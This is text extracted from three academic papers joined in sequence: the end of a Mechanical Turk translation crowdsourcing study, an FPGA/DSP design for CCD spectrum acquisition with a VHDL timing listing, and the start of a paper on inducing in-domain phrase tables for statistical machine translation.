Amharic, Armenian, Azer- baijani, Breton, Catalan, Georgian, Latvian, Luxembour- gish, Neapolitian, Norwegian (Nynorsk), Pashto, Pied- montese, Somali, Sudanese, Swahili, Tatar, Vietnamese, Walloon, Welsh none low or medium slow Esperanto, Ido, Kurdish, Per- sian, Quechua, Wolof, Zazaki Table 6: The green box shows the best languages to target on MTurk. These languages have many work- ers who generate high quality results quickly. We defined many workers as 50 or more active in-region workers, high quality as ≥70% accuracy on the gold standard controls, and fast if all of the 10,000 words were completed within two weeks. candidates provided adequate quality control mech- anisms are used to select good workers. Since Mechanical Turk provides financial incen- tives for participation, many workers attempt to complete tasks even if they do not have the lan- guage skills necessary to do so. Since MTurk does not provide any information about workers demo- graphics, including their language competencies, it can be hard to exclude such workers. As a result naive data collection on MTurk may result in noisy data. A variety of techniques should be incorporated into crowdsourcing pipelines to ensure high quality data. As a best practice, we suggest: (1) restricting workers to countries that plausibly speak the foreign language of interest, (2) embedding gold standard controls or administering language pretests, rather than relying solely on self-reported language skills, and (3) excluding workers whose translations have high overlap with online machine translation sys- tems like Google translate. If cheating using exter- nal resources is likely, then also consider (4) record- ing information like time spent on a HIT (cumulative and on individual items), patterns in keystroke logs, tab/window focus, etc. Although our study targeted bilingual workers on Mechanical Turk, and neglected monolingual work- ers, we believe our results reliably represent the cur- rent speaker populations, since the vast majority of the work available on the crowdsourced platform is currently English-only. We therefore assume the number of non-English speakers is small. In the fu- ture, it may be desirable to recruit monolingual for- eign workers. In such cases, we recommend other tests to validate their language abilities in place of our translation test. These could include perform- ing narrative cloze, or listening to audio files con- taining speech in different language and identifying their language. 7 Data release With the publication of this paper, we are releasing all data and code used in this study. Our data release includes the raw data, along with bilingual dictionar- ies that are filtered to be high quality. It will include 256,604 translation assignments from 5,281 Turkers and 20,952 synonym assignments from 1,005 Turk- ers, along with meta information like geolocation 88 and time submitted, plus external dictionaries used for validation. The dictionaries will contain 1.5M total translated words in 100 languages, along with code to filter the dictionaries based on different cri- teria. The data also includes parallel corpora for six Indian languages, ranging in size between 700,000 to 1.5 million words. 8 Acknowledgements This material is based on research sponsored by a DARPA Computer Science Study Panel phase 3 award entitled “Crowdsourcing Translation” (con- tract D12PC00368). The views and conclusions contained in this publication are those of the authors and should not be interpreted as representing offi- cial policies or endorsements by DARPA or the U.S. Government. This research was supported by the Johns Hopkins University Human Language Tech- nology Center of Excellence and through gifts from Microsoft and Google. The authors would like to thank the anonymous reviewers for their thoughtful comments, which sub- stantially improved this paper. References Amazon. 2013. Service summary tour for re- questers on Amazon Mechanical Turk. https:// requester.mturk.com/tour. Vamshi Ambati and Stephan Vogel. 2010. Can crowds build parallel corpora for machine translation systems? In Proceedings of the NAACL HLT 2010 Workshop on Creating Speech and Language Data with Amazon’s Mechanical Turk. Association for Computational Lin- guistics. Vamshi Ambati, Stephan Vogel, and Jaime Carbonell. 2010. Active learning and crowd-sourcing for ma- chine translation. In Proceedings of the 7th Interna- tional Conference on Language Resources and Evalu- ation (LREC). Vamshi Ambati. 2012. Active Learning and Crowd- sourcing for Machine Translation in Low Resource Scenarios. Ph.D. thesis, Language Technologies In- stitute, School of Computer Science, Carnegie Mellon University, Pittsburgh, PA. Michael S. Bernstein, Greg Little, Robert C. Miller, Bjrn Hartmann, Mark S. Ackerman, David R. Karger, David Crowell, and Katrina Panovich. 2010. Soylent: a word processor with a crowd inside. In Proceed- ings of the ACM Symposium on User Interface Soft- ware and Technology (UIST). Jeffrey P. Bigham, Chandrika Jayant, Hanjie Ji, Greg Lit- tle, Andrew Miller, Robert C. Miller, Robin Miller, Aubrey Tatarowicz, Brandyn White, Samual White, and Tom Yeh. 2010. VizWiz: nearly real-time an- swers to visual questions. In Proceedings of the ACM Symposium on User Interface Software and Technol- ogy (UIST). Michael Bloodgood and Chris Callison-Burch. 2010. Large-scale cost-focused active learning for statisti- cal machine translation. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics. Chris Callison-Burch and Mark Dredze. 2010. Creating speech and language data with Amazon’s Mechanical Turk. In Proceedings of the NAACL HLT 2010 Work- shop on Creating Speech and Language Data with Amazon’s Mechanical Turk, pages 1–12, Los Angeles, June. Association for Computational Linguistics. Jia Deng, Alexander Berg, Kai Li, and Li Fei-Fei. 2010. What does classifying more than 10,000 image cate- gories tell us? In Proceedings of the 12th European Conference of Computer Vision (ECCV, pages 71–84. Maxine Eskenazi, Gina-Anne Levow, Helen Meng, Gabriel Parent, and David Suendermann. 2013. Crowdsourcing for Speech Processing, Applications to Data Collection, Transcription and Assessment. Wi- ley. Siamak Faridani, Björn Hartmann, and Panagiotis G. Ipeirotis. 2011. What’s the right price? pricing tasks for finishing on time. In Third AAAI Human Compu- tation Workshop (HCOMP’11). Ulrich Germann. 2001. Building a statistical machine translation system from scratch: How much bang for the buck can we expect? In ACL 2001 Workshop on Data-Driven Machine Translation, Toulouse, France. Chang Hu, Benjamin B. Bederson, and Philip Resnik. 2010. Translation by iterative collaboration between monolingual users. In Proceedings of ACM SIGKDD Workshop on Human Computation (HCOMP). Chang Hu, Philip Resnik, Yakov Kronrod, Vladimir Ei- delman, Olivia Buzek, and Benjamin B. Bederson. 2011. The value of monolingual crowdsourcing in a real-world translation scenario: Simulation using haitian creole emergency sms messages. In Pro- ceedings of the Sixth Workshop on Statistical Ma- chine Translation, pages 399–404, Edinburgh, Scot- land, July. Association for Computational Linguistics. Panagiotis G. Ipeirotis. 2010a. Analyzing the mechani- cal turk marketplace. In ACM XRDS, December. Panagiotis G. Ipeirotis. 2010b. Demographics of Mechanical Turk. Technical Report Working paper 89 CeDER-10-01, New York University, Stern School of Business. Ann Irvine and Alexandre Klementiev. 2010. Using Me- chanical Turk to annotate lexicons for less commonly used languages. In Workshop on Creating Speech and Language Data with MTurk. Ian Lane, Matthias Eck, Kay Rottmann, and Alex Waibel. 2010. Tools for collecting speech corpora via mechanical-turk. In Proceedings of the NAACL HLT 2010 Workshop on Creating Speech and Lan- guage Data with Amazon’s Mechanical Turk, Los An- geles. Florian Laws, Christian Scheible, and Hinrich Schütze. 2011. Active learning with amazon mechanical turk. In Proceedings of the 2011 Conference on Empirical Methods in Natural Language Processing, Edinburgh, Scotland. Matthew Lease, Jessica Hullman, Jeffrey P. Bigham, Juho Kim Michael S. Bernstein and, Walter Lasecki, Saeideh Bakhshi, Tanushree Mitra, and Robert C. Miller. 2013. Mechanical Turk is not anony- mous. http://dx.doi.org/10.2139/ssrn. 2228728. Vili Lehdonvirta and Mirko Ernkvist. 2011. Knowl- edge map of the virtual economy: Converting the virtual economy into development potential. http://www.infodev.org/en/Document. 1056.pdf, April. An InfoDev Publication. M. Paul Lewis, Gary F. Simons, and Charles D. Fennig (eds.). 2013. Ethnologue: Languages of the world, seventeenth edition. http://www.ethnologue. com. Greg Little, Lydia B. Chilton, Rob Miller, and Max Gold- man. 2009. Turkit: Tools for iterative tasks on me- chanical turk. In Proceedings of the Workshop on Human Computation at the International Conference on Knowledge Discovery and Data Mining (KDD- HCOMP ’09), Paris. Matthew Marge, Satanjeev Banerjee, and Alexander Rudnicky. 2010. Using the Amazon Mechanical Turk to transcribe and annotate meeting speech for extrac- tive summarization. In Workshop on Creating Speech and Language Data with MTurk. George A. Miller. 1995. WordNet: a lexical database for english. Communications of the ACM, 38(11):39–41. Robert Munro and Hal Tily. 2011. The start of the art: Introduction to the workshop on crowdsourcing technologies for language and cognition studies. In Crowdsourcing Technologies for Language and Cog- nition Studies, Boulder. Scott Novotney and Chris Callison-Burch. 2010. Cheap, fast and good enough: Automatic speech recognition with non-expert transcription. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Com- putational Linguistics, pages 207–215. Association for Computational Linguistics. Gabriel Parent and Maxine Eskenazi. 2011. Speaking to the crowd: looking at past achievements in using crowdsourcing for speech and predicting future chal- lenges. In Proceedings Interspeech 2011, Special Ses- sion on Crowdsourcing. Matt Post, Chris Callison-Burch, and Miles Osborne. 2012. Constructing parallel corpora for six indian languages via crowdsourcing. In Proceedings of the Seventh Workshop on Statistical Machine Translation, pages 401–409, Montréal, Canada, June. Association for Computational Linguistics. Alexander J. Quinn and Benjamin B. Bederson. 2011. Human computation: A survey and taxonomy of a growing field. In Computer Human Interaction (CHI). Cyrus Rashtchian, Peter Young, Micah Hodosh, and Ju- lia Hockenmaier. 2010. Collecting image annotations using Amazon’s Mechanical Turk. In Workshop on Creating Speech and Language Data with MTurk. Joel Ross, Lilly Irani, M. Six Silberman, Andrew Zal- divar, and Bill Tomlinson. 2010. Who are the crowd- workers?: Shifting demographics in Amazon Mechan- ical Turk. In alt.CHI session of CHI 2010 extended abstracts on human factors in computing systems, At- lanta, Georgia. Yaron Singer and Manas Mittal. 2011. Pricing mecha- nisms for online labor markets. In Third AAAI Human Computation Workshop (HCOMP’11). Rion Snow, Brendan O’Connor, Daniel Jurafsky, and Andrew Y. Ng. 2008. Cheap and fast - but is it good? Evaluating non-expert annotations for natural language tasks. In Proceedings of EMNLP. Alexander Sorokin and David Forsyth. 2008. Utility data annotation with amazon mechanical turk. In First IEEE Workshop on Internet Vision at CVPR. Luis von Ahn. 2005. Human Computation. Ph.D. thesis, School of Computer Science, Carnegie Mellon Uni- versity, Pittsburgh, PA. Omar F. Zaidan and Chris Callison-Burch. 2011. Crowd- sourcing translation: Professional quality from non- professionals. In Proceedings of the 49th Annual Meeting of the Association for Computational Lin- guistics: Human Language Technologies, pages 1220– 1229. Association for Computational Linguistics. Rabih Zbib, Erika Malchiodi, Jacob Devlin, David Stallard, Spyros Matsoukas, Richard Schwartz, John Makhoul, Omar F. Zaidan, and Chris Callison-Burch. 2012. Machine translation of Arabic dialects. In The 2012 Conference of the North American Chapter of the Association for Computational Linguistics. Asso- ciation for Computational Linguistics. 90 Rabih Zbib, Gretchen Markiewicz, Spyros Matsoukas, Richard Schwartz, and John Makhoul. 2013. Sys- tematic comparison of professional and crowdsourced reference translations for machine translation. In Pro- ceedings of the 2013 Conference of the North Amer- ican Chapter of the Association for Computational Linguistics: Human Language Technologies, Atlanta, Georgia. 91 92 work_rvkwzwr6mrdpfa3xaatodygocu ---- Your Paper's Title Starts Here: Please Center A Fast Optical Spectrum Data Acquisition Method Based on FPGA and DSP Liqun Xu 1 , Gong Jiaming 2 1. 616 Atkins Rd Little Rock, AR, USA, 72211, liqunxu2000@gmail.com 2. Xian university of Posts & Telecomm. 710061, gjm@xiyou.edu.cn Abstract. This paper presents a fast CCD optical spectrum data acquisition method based on FPGA, FIFO and DSP. Introduces a linear CCD timing sequence control signal generation and high speed ADC interface with FIFO and DSP in detail, publishes this design key parts FPGA logic schematic and VHDL source code, provides a general solution for universal high speed CCD optical spectrum data acquisition and analysis system. Keywords: Linear CCD, FPGA, FIFO, DSP 1. Introduction Fiber spectrometer is the key parts in portable Raman spectrometers, It is composed of Linear CCD detector , optical parts (filter, diffraction grating, lens etc) and data acquisition, store and processing circuit part, but how do to fast sample and save this optical spectrum data into PC is a critical issue for the fiber spectrometers. So this paper presents a powerful method of fast CCD data acquisition, introduces the method and key parts implement hardware schematic and FPGA VHDL source code in detail. 2. System design based on FPGA and DSP Whole system level hardware design digram is showed as figure 1, In this design, ILX511 Linear CCD is selected as optical spectrum detector, in order to obtain high SNR and high resulation in this system, a high performance 18 bit SAR ADC chip AD7641 is used, also an asynchronized FIFO RAM has been used as bridge between the ADC and DSP, FPGA is used to generate variety CCD timing clock and asynchronized FIFO control signal. TMS320VC5509A DSP is used as a whole system center control unit, because of it’s fast data processing ability,low power consumption and built in USB 2.0 port. so by using this DSP chip, the CCD sampling optical spectrum data can be fast transmitted to DSP internal SRAM and then do Raman data analyzing algorithm, also taking advantage of this DSP USB 2.0 port, the sampling data can be fast sent to PC. With DSP powerful McBSP communication port, the DSP chip can easy send the command to FPGA and laser control driver. TFT color display is a option in future product update. A D C Linear CCD Detector CCD Control Signal CCD Analogy CCD Clock Pulse Generator Circuit Latch and FIFO TMS320VC5509A DSP Signal generator ADC Control Data Bus D0~D15 EXT INT0 McBSP1 Serial to Parallel FPGA and DSP communciation USB 2.0 Pocket PC McBSP2 EXT INT1 Serial to Parallel TFT Color LCD Key Scan control IC SDA I2C BUS SCL Key Pads MAX7349 EP16CT144C8 FPGA CONVST BUSY EMIF Laser Control Circuit MCU Communciation Though SPI to DSP Output Signal McBSP0 Fig 1. Raman Spectrometer System Digram 3. Linear CCD Time Sequence Signal Generation and Optical Spectrum Data Aacquisition A. ILX511 linear CCD time suquence signal generation The ILX511 is CCD linear image sensor, it’s feature: 2048 pixels, 14 µm x 200 µm (14 µm pitch), Single 5 V power supply, ultra-high sensitivity, built-in sample-and-hold circuit, maximum clock frequency is 2MHz, its wavength range from 400~ 1000nm, it is well fit to Raman Spectrum data analying wavelength range, when use a 785 nm laser source. Figure 2 shows this CCD detector time sequence diagram, figure 3 shows its analog output waveform, so in order to driver ILX 511 CCD , external driver circuit has to provide two time sequence control signal : one is CCD clock signal ΦCLK , it’s maximum frequency is 2Mhz, tpical working in 1Mhz. another is timing driver signal ΦROG. The ΦROG pulse period decides the scan a frame pixel time and CCD exposure time, since a frame has 2048 pixel + 38 dummy signal = 2086 clock pulse, so scaning a frame CCD pixel needs at least 2086 clocks signal period, and the true effective clock generated analog signal , which is sensitive optical exposure source, has only 2048 pulse. so CCD time sequence signal generation module has to have function as follows: 1) gernerates ΦROG pulse , ΦROG period > 20486 X ΦCLK period; 2) generates more than 2086 clock pulse ΦCLK; 3) generates 2048 clock pulse with duty cycle 50% ΦADC_CONST, which is corrposed CCD output analog signal and synchronized to start ADC convter. The CCD_ROG negative pulse enable the CCD output effective and let the CCD exposured piexl convter analog signal output by CCD clk clock driving . So how to create these three control pulse is the design key point. Fig 2 ILX511 Linear CCD Clock Timing Diagram Fig 3 CCD Analog output CCD ROG CCD CLK ADC CONST a frame CCD scan time sequnce > 2088 clock pulse 2048 clock pulse Fig. 4 3 key CCD control pulse waveform Figure 4 displays this three control pulse waveform, and figure 5 presents their FPGA loglic function schematic. In this design, a stable 20Mhz clock source can be obtained though FPGA internal PLL , Divide this 20 Mhz clock source into 1 MHz with 50% duty cycle using a divider, this 1Mhz clock function as whole CCD driving clock source, the CCD and ADC time sequence control signal generation module is show in Figure 5. In order to obtain a Φ ROG signal , use a 4 divider to get a 8 us width pulse as a ROG generator, the ΦROG period is controlled by reciving parameter though McBSP port coming from DSP. clk_in clk4 clk_div ide_ROG inst20 clk rog adc_start ADC_Start_Ctr inst10 AND2 inst15 NOT inst22 ADC_CONVST !Mhz AND2 inst23 CCD_ROG1OUTPUT ADC CONSTOUTPUT CCD CLKOUTPUT VCC CLK In INPUT Fig 5 CCD and ADC time sequence control signal generation module diagram In Figure 5, module inst20 implement the ΦROG pulse generation function, module inst10 implement the CCD clk and ADC start pulse signal. The figure 6 shows this signal generation simulation waveforms. Inst20 and inst10 mode VHDL code is present in follows. the inst10 VHDL is the same with inst17 in figure 7, difference is inst17 VHDL adds FIFO contol function. As figure 6 show the simulation result, the function is exactly well meet the CCD control time seqence reguirment. Fig6 CCD and ADC timeing sequence generation waveform B. CCD data sampling and transmit into DSP Internal SRAM How do the CCD sampling data fast transmit to DSP internal SRAM is secondly key design point. Since TMS320VC5509A DSP has more rapidly operation speed when core clock freqency works in 200Mhz, and the ccd scan clcok frequnce is 1Mhz, if using the 1 Mhz pulse to directly triger the DSP external interrupt source, the high data rate cannot be achieved to read data from the converter. Because Interrupt latencies prevent the DSP from reacting fast enough and even use a direct memory access (DMA) tramit data. since the high data tied up most of I/O port bandwith, the Whole DSP working efficiency will drop too much, so an ideal solution is use FIFO as buffer bridge, when whole 2048 pixel of CCD signal has been sampled and saved to FIFO, the bolck data can be read in burst from FIFO to DSP SRAM though DMA mode. Figure 6 give a whole CCD and FIFO control signal FPGA schematic, Lpm_counter1 is used only for simulation ADC input data. Although Altera FPGA provides rich FIFO source, factual using has a lot of trick. The W_REQ and R_REQ has to set strictly , usually output signal W_full and R emprty signal are used as a monitor judgment, but facul using R_REQ as external data start to read is more better than using W_full. from Figure 7, rdempty outpout signal provides a read FIFO effective signal, so use R_REQ as DSP external interrupt trigger signal, in DSP interrupt response routine, read whole 2048 data block, when DSP implement read EMIF, it generates a ARE signal, which can be utilized as synchronized FIFO read data clock signal R_clk; from the Fig6 schematic, ADC_StartCtr mode provides ADC start signal, and ADC busy output signal is used as FIFO write data clock signal , that means ,only when ADC finish one conversion, the ADC conveter data is valid and the sampling data can be saved to FIFO RAM, from Fig.9 , Fig.10, when R_Req is ready, ADC_out data is not effective, need wait for 6 r_clk clock, so using R_Req as DSP interrupt source, in DSP interrupt service routine, discard first 6 data and keep reading 2048 data using DMA counter. So from D[0] to D[2047] total 2048 sampling data can be read to DSP SRAM. Fig. 8 shows the function implement simulation result of figure 6, from this waveform, the W_clk set in 10ns and r_clk is set 1ns, that means let r_clk is 10 times fast than W_clk , and result show read data bolck is fast 10 times than write data block. It sucessfully soloves the difficulity of ADC and DSP asynchronized data read and write speed. VCC ADC_IN[15..0] INPUT VCC R_CLK INPUT VCC CLK_In INPUT CCD_CLK1OUTPUT W_ReqOUTPUT R_ReqOUTPUT CCD_ROGOUTPUT ADC_CONSTOUTPUT Wr_f ullOUTPUT ADC_Out[15..0]OUTPUT W_CLKOUTPUT rdemptyOUTPUT ADC_In_Sim[15..0]OUTPUT Rdusedw[11..0]OUTPUT wrusedw[11..0]OUTPUT clk rog adc_start W_Req R_Req ADC_Start_Ctr inst8 clk_in clk4 clk_div ide_ROG inst24 AND2 inst25 NOT inst29 AND2 inst38 AND2 inst39 AND2 inst40 up counter clock cnt_en a c lr q[15..0] lpm_counter1 inst 16 bits x 4096 words data[15..0] w rreq w rclk rdreq rdclk aclr w rf ull w rusedw [11..0] q[15..0] rdempty rdusedw [11..0] dcfifo2 inst26 ADC_CONVST 1 Mhz Fig. 7 CCD and FIFO control signal schematic Fig.8 CCD and FIFO control signal simulatiom waveform Fig.9 Data read initial side Fig.10. Data read end side C. FPGA control mode VHDL Source Code ------- CCD ROG signal generation VHDL library ieee; use ieee.std_logic_1164.all; use ieee.numeric_std.all; entity clk_divide_ROG is Port(clk_in: in std_logic; clk4: out std_logic); end entity clk_divide_ROG; Architecture behave of clk_divide_ROG is signal clk10c: std_logic; Signal div10cnt: unsigned( 15 downto 0); begin Process(clk_in) begin if(clk_in'event and clk_in='1') then div10cnt<=div10cnt+1; end if; if(div10cnt<="0000000000000000") then clk10c<='1'; elsif(div10cnt> "0000000000000001" and div10cnt< " 0001000001010100 ") then -- more than 2088 clock clk10c<='0'; elsif(div10cnt >= " 0001000001010101 ") then div10cnt<="0000000000000000"; end if; clk4 <= clk10c ; end process; end architecture behave; 4. CCD, ADC , FPGA and DSP hardware Interface Figure 11 shows the CCD, ADC, FPGA and DSP important wires connection associated with system sampling data transmit. The ADC7641 ADC chip is selected, it’s an 18bit high performance SAR ADC with SNR 93 db, 2 MSPS, and its power supply only has 2.5 V and differential input range is ±2.5V, also it’s power consumption has only 75mw, this extraordinary fetures is espcially well suitable for portable and handheld Raman optical anaylis instrument. In this design set ADC mode in 16 bit parallel, and sampling mode set in normal 1.5 MSPS. TMS320VC5509A has external memory interface(EMIF) with SARM and SDRAM, and six DMA controllers, it’s external memory space is divided into 4 spaces by CE0~CE3, in this design, CE2 is used to select momory space from address 0x80,0000 to 0xc0,0000; so use 0x80,0000 to 0x0x80,0800 total 2048 byte external memory space as FIFO source address, and assign internal SRAM 0x 02,0000 to 0x020800 as DMA destination memory space. CCD_CLK CCD_ROG ADC_BUSY ADC_CONVST ADC_Out[0..15] R CLK DSP_EXT_INT ADC_IN[0..15] 9 7 6, 10 5 8 1, 2 3 4 AD7641 D[0..15] INT0 ARE CE2 TMS320VC5509A analog signal OPA FPGA EMIF DSP Vout CCD_CLKCCD_ROG CCD Dectector Vi+ ADC_BUSY CNVST ADC_D[0..15] mode0 mode1 warp Normal AD7641 A D C V C C G N D 7 5 8 A OR gate Fig. 11 CCD, ADC , FPGA and DSP Interface Fig 12 Optical specturm sampling dispaly Figure 12 shows a 785nm laser source optical spectrum waveform, this waveform indicates that the whole system data sampling is success and the optical spectrum data can be fast transmitted to Pocket PC though USB 2.0. 5. Conclusions Since FPGA is based on SRAM filed programmable arrary, so it can be composed of different size and depth of FIFO RAM. by using FPGA, variety CCD timing sequnce control signal can be flexibly creatived, for different clock frequency CCD, just change the correspond conversion speed ADC chip, change FIFO reading and writing clock frequency, the ADC sampling data can be fast transmitted to DSP internal SRAM, meanwhile, DSP can implement real time algorithm and then transmits data to PC through it’s USB port. Therfore this design provides a comprehensive optical spectrum data acquisition method. Reference [1] Using TI FIFO to Interface High- Speed Data Converters with TI TMS320DSPs Robert finger, TI application Report SDMA001 June. 2001. [2] Designing With TI SN74V2x5 FIFO Programmable Flags Gary Khazan and Clayton Gibbs May 2001. [3] Altera Cyclone FPGA Family Datasheet, Altera corpation , May, 2008. [4] TMS320VC5503/5507/5509/5510 DSP Direct Memory Access (DMA) Controller Reference Guide Literature number SPRU587E , Jan. 2007 TI. [5] SONY ILX511 datasheet. [6] AD7641 Datasheet Analog Device Inc. 2006. [7] VHDL hardware description langue and digital logic circuit design, Hou Baihen, Gu Xin, 1999. work_rxaui7o4kzczlmk53n3amxhe54 ---- Phrase Table Induction Using In-Domain Monolingual Data for Domain Adaptation in Statistical Machine Translation Benjamin Marie Atsushi Fujita National Institute of Information and Communications Technology 3-5 Hikaridai, Seika-cho, Soraku-gun, Kyoto, 619-0289, Japan {bmarie, atsushi.fujita}@nict.go.jp Abstract We present a new framework to induce an in- domain phrase table from in-domain monolin- gual data that can be used to adapt a general- domain statistical machine translation system to the targeted domain. Our method first compiles sets of phrases in source and target languages separately and generates candidate phrase pairs by taking the Cartesian product of the two phrase sets. It then computes in- expensive features for each candidate phrase pair and filters them using a supervised clas- sifier in order to induce an in-domain phrase table. We experimented on the language pair English–French, both translation directions, in two domains and obtained consistently better results than a strong baseline system that uses an in-domain bilingual lexicon. We also con- ducted an error analysis that showed the in- duced phrase tables proposed useful transla- tions, especially for words and phrases unseen in the parallel data used to train the general- domain baseline system. 1 Introduction In phrase-based statistical machine translation (SMT), translation models are estimated over a large amount of parallel data. In general, using more data leads to a better translation model. When no specific domain is targeted, general-domain1 par- allel data from various domains may be used to 1As in Axelrod et al. (2011), in this paper, we use the term general-domain instead of the commonly used out-of-domain because we assume that the parallel data may contain some in- domain sentence pairs. train a general-purpose SMT system. However, it is well-known that, in training a system to trans- late texts from a specific domain, using in-domain parallel data can lead to a significantly better trans- lation quality (Carpuat et al., 2012). Indeed, when only general-domain parallel data are used, it is un- likely that the translation model can learn expres- sions and their translations specific to the targeted domain. Such expressions will then remain untrans- lated in the in-domain texts to translate. So far, in-domain parallel data have been har- nessed to cover domain-specific expressions and their translations in the translation model. However, even if we can assume the availability of a large quantity of general-domain parallel data, at least for resource-rich language pairs, finding in-domain par- allel data specific to a particular domain remains challenging. In-domain parallel data may not exist for the targeted language pairs or may not be avail- able at hand to train a good translation model. In order to circumvent the lack of in-domain par- allel data, this paper presents a new method to adapt an existing SMT system to a specific domain by in- ducing an in-domain phrase table, i.e., a set of phrase pairs associated with features for decoding, from in- domain monolingual data. As we review in Sec- tion 2, most of the existing methods for inducing phrase tables are not designed, and may not perform as expected, to induce a phrase table for a specific domain for which only limited resources are avail- able. Instead of relying on large quantity of parallel data or highly comparable corpora, our method in- duces an in-domain phrase table from unaligned in- domain monolingual data through a three-step pro- 487 Transactions of the Association for Computational Linguistics, vol. 5, pp. 487–500, 2017. Action Editor: Chris Quirk. Submission batch: 3/2017; Published 11/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. cedure: phrase collection, phrase pair scoring, and phrase pair filtering. Incorporating our induced in- domain phrase table into an SMT system achieves substantial improvements in translating in-domain texts over a strong baseline system, which uses an in-domain bilingual lexicon. To achieve this improvement, our proposed method for inducing an in-domain phrase table ad- dresses several limitations of previous work by: • dealing with source and target phrases of arbi- trary length collected from in-domain monolin- gual data, • proposing translations for not only unseen source phrases, but also those already seen in the general-domain parallel data, and • making use of potentially many features com- puted from the monolingual data, as well as from the parallel data, in order to score and fil- ter the candidate phrase pairs. In the remainder of this paper, we first review previous work in Section 2, highlighting the main weaknesses of existing methods for inducing a phrase table for domain adaptation, and our moti- vation. In Section 3, we then present our phrase ta- ble induction method with all the necessary steps: phrase collection (Section 3.1), computing features of each phrase pair (Section 3.2), and pruning the induced phrase tables to keep their size manageable (Section 3.3). In Section 4, we describe our exper- iments to evaluate the impact of the induced phrase tables in translating in-domain texts. Following the description of the data (Section 4.1), we explain the tools and parameters used to induce the phrase tables (Section 4.2), our SMT systems (Section 4.3), and present additional baseline systems (Section 4.4). Our experimental results are given in Section 4.5. Section 5.1 analyzes the error distribution of the translations produced by an SMT system using our induced phrase table, followed by translation exam- ples to further illustrate its impact in Section 5.2. Fi- nally, Section 6 concludes this work and proposes some possible improvements to our approach. 2 Motivation In machine translation (MT), words and phrases that do not appear in the training parallel data, i.e., out- of-vocabulary (OOV) tokens, have been recognized as one of the fundamental issues, regardless of the scenario, such as adapting existing SMT systems to a new specific domain. One straightforward way to find translations of OOV words and phrases consists in enlarging the parallel data used to train the translation model. This can be done by retrieving parallel sentences from comparable corpora. However, these methods heav- ily rely on document-level information (Zhao and Vogel, 2002; Utiyama and Isahara, 2003; Fung and Cheung, 2004; Munteanu and Marcu, 2005) to re- duce their search space by scoring only sentence pairs extracted from each pair of documents. In- deed, scoring all possible sentence pairs from two large monolingual corpora using costly features and a classifier, as proposed by Munteanu and Marcu (2005) for instance, is computationally too expen- sive.2 In many cases, we may not have access to document-level information in the given monolin- gual data for the targeted domain. Furthermore, even without considering computational cost, it is unlikely that a large number of parallel sentences can be retrieved from non-comparable monolingual corpora. Hewavitharana and Vogel (2016) proposed to directly extract phrase pairs from comparable sen- tences. However, the number of retrievable phrase pairs is strongly limited, because one can collect such comparable sentences only on a relatively small scale for the targeted language pairs and domains. When in-domain parallel or comparable sentences can not be easily retrieved, another possibility to find translations for OOV words is bilingual word lexi- con induction using comparable or unaligned mono- lingual corpora (Fung, 1995; Rapp, 1995; Koehn and Knight, 2002; Haghighi et al., 2008; Daumé and Jagarlamudi, 2011; Irvine and Callison-Burch, 2013). This approach is especially useful in finding words and their translations specific to the given cor- pus. A recent and completely different trend of work uses an unsupervised method regarding translation as a decipherment problem to learn a bilingual word lexicon and use it as a translation model (Ravi and Knight, 2011; Dou and Knight, 2012; Nuhn et al., 2012). However, all these methods deal only with 2For instance, using these approaches on source and target monolingual data containing both 5 millions sentences means that we have to evaluate 25×1012 candidate sentence pairs. 488 words, mainly owing to the computational complex- ity of dealing with arbitrary lengths of phrases. Translations of phrases can be induced using bilingual word lexicons and considering permuta- tions of word ordering (Zhang and Zong, 2013; Irvine and Callison-Burch, 2014). However, it is costly to thoroughly investigate all combinations of a large number of word-level translation candi- dates and possible permutations of word ordering. To retain only appropriate phrase pairs, Irvine and Callison-Burch (2014) proposed to exploit a set of features. Some of them, including temporal, contex- tual, and topic similarity features, strongly relied on the comparability of Wikipedia articles and on the availability of news articles annotated with a times- tamp (Klementiev et al., 2012). We may not have such useful resources in large quantity for the tar- geted language pairs and domains. Saluja et al. (2014) and Zhao et al. (2015) also proposed methods to induce a phrase table, focus- ing only on the OOV words and phrases: unigrams and bigrams in the source side of their development and test data that are unseen in the training data. In their approach, no new translation options are proposed for known source phrases. To generate candidate phrase pairs, for a given source phrase, Saluja et al. (2014) uses only phrases from the tar- get side of their parallel data and their morphologi- cal variants ranked and pruned according to the for- ward lexical translation probabilities given by their baseline system’s translation model. Their approach thus strongly relies on the accuracy of the exist- ing translation model. For instance, if the given source phrase contains only OOV tokens, as it may happen when translating a text from a different do- main, their approach cannot retrieve candidate tar- get phrases. Furthermore, they do not make use of external monolingual data to explore unseen target phrases. Their method is consequently inadequate to produce translations for phrases from a different domain than the one of the parallel data. While Saluja et al. (2014) used a costly graph propagation strategy to score the candidate phrase pairs, Zhao et al. (2015) used a method with a much lower computational cost and reported higher BLEU scores using only word embeddings to score and rank many phrase pairs generated from tar- get phrases, unigrams and bigrams, collected from monolingual corpora. The main contribution of Zhao et al. (2015) is the use of a local linear projec- tion strategy (LLP) to obtain a cross-lingual seman- tic similarity score for each phrase pair. It makes the projection of source embeddings to the target em- beddings space by learning a translation matrix for each source phrase embedding, trained on m gold phrase pairs with source phrase embeddings simi- lar to the one to project. After the projection, based only on the similarity over embeddings, the k near- est target phrases of the projected source phrase are retrieved. If the projection for a given source phrase is not accurate enough, very noisy phrase pairs are generated. This may be a problem especially when the given source phrase does not need to be trans- lated (i.e., numbers, dates, molecule names, etc.). The system will translate it, because this source phrase previously OOV is now registered in its in- duced phrase table, but has only wrong translations available (see Section 4.5 for empirical evidences). 3 In-domain phrase table induction To induce an in-domain phrase table, our approach assumes the availability of large general-domain parallel data and in-domain monolingual data of both source and target languages. For some of our configurations, we also assume the availability of an in-domain bilingual lexicon to compute features as- sociated with each candidate phrase pair and to com- pute a reliability score to filter appropriate ones. 3.1 In-domain phrase collection In a standard configuration, SMT systems extract phrases of a length up to six or seven tokens. Col- lecting all the n-grams of such a length from a given large monolingual corpus is feasible, but will pro- vide a large set of source and target phrases, re- sulting in an enormous number of candidate phrase pairs. In the next step, we evaluate each candidate in a given set of phrase pairs; it is thus crucial to get a reasonably small set of phrases. In contrast with previous work, we collect more meaningful phrases than arbitrary short n-grams, us- ing the following formula presented by Mikolov et al. (2013a): score(wiwj) = freq(wiwj)−δ freq(wi)× freq(wj) 489 where wi and wj are two consecutive tokens, freq(·) the frequency of a given word or phrase in the given monolingual corpus, and δ a discounting coefficient that prevents the retrieval of many phrases composed from infrequent words. Each bigram wiwj in the 